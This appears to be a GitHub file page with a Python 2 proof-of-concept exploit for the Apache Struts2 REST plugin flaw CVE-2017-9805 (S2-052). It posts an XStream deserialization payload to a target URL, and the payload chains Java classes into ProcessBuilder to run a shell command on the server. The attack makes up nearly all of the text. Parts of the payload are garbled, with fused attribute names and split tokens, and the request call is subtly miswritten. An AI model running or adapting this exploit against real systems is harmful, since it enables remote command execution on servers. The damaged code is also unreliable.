-
Notifications
You must be signed in to change notification settings - Fork 4
/
CVE-2017-9805-S2-052-POC.py
35 lines (30 loc) · 2.6 KB
/
CVE-2017-9805-S2-052-POC.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
#!/usr/bin/env python
# -*- coding:utf-8 -*-
# author:ray
# date:2019-4-10
import requests
import sys
header = {
'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:49.0) Gecko/20100101 Firefox/49.0',
'Content-Type':'application/xml',
'Connection':'close',
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'
}
payload = '''<map><entry><jdk.nashorn.internal.objects.NativeString><flags>0</flags><valueclass="com.sun.xml.internal.bind.v2.runtime.unmarshaller .Base64Data"><dataHandler><dataSourceclass="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource"><isclass="javax.crypto.CipherInputStream"><ciph erclass="javax.crypto.NullCipher"><initialized>false</initialized><opmode>0</opmode><serviceIteratorclass="javax.imageio.spi.FilterIterator"><iterclass="j avax.imageio.spi.FilterIterator"><iterclass="java.util.Collections$EmptyIterator"/><nextclass="java.lang.ProcessBuilder"><command><string>touch</string><s tring>/tmp/success</string></command><redirectErrorStream>false</redirectErrorStream></next></iter><filterclass="javax.imageio.ImageIO$ContainsFilter"><me thod><class>java.lang.ProcessBuilder</class><name>start</name><parameter-types/></method><name>foo</name></filter><nextclass="string">foo</next></serviceI terator><lock/></cipher><inputclass="java.lang.ProcessBuilder$NullInputStream"/><ibuffer></ibuffer><done>false</done><ostart>0</ostart><ofinish>0</ofinish ><closed>false</closed></is><consumed>false</consumed></dataSource><transferFlavors/></dataHandler><dataLen>0</dataLen></value></jdk.nashorn.internal.obje cts.NativeString><jdk.nashorn.internal.objects.NativeStringreference="../jdk.nashorn.internal.objects.NativeString"/></entry><entry><jdk.nashorn.internal. objects.NativeStringreference="../../entry/jdk.nashorn.internal.objects.NativeString"/><jdk.nashorn.internal.objects.NativeStringreference="../../entry/jd k.nashorn.internal.objects.NativeString"/></entry></map>'''
def poc(url, data, headers):
response = requests.post(url, data, headers)
if response.status_code == 500 or r"java.security.Provider$Service" in response:
print '【*】The Vulnerability exists S2-052···'
print
else:
return response.text
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage : python CVE-2017-9805-S2-052-POC.py http://127.0.0.1/orders/ "
else:
print "----------------------------------------"
print "| CVE-2017-9805 | S2-052-POC |"
print "----------------------------------------"
print
url = sys.argv[1]
poc(url, data=payload, headers=header)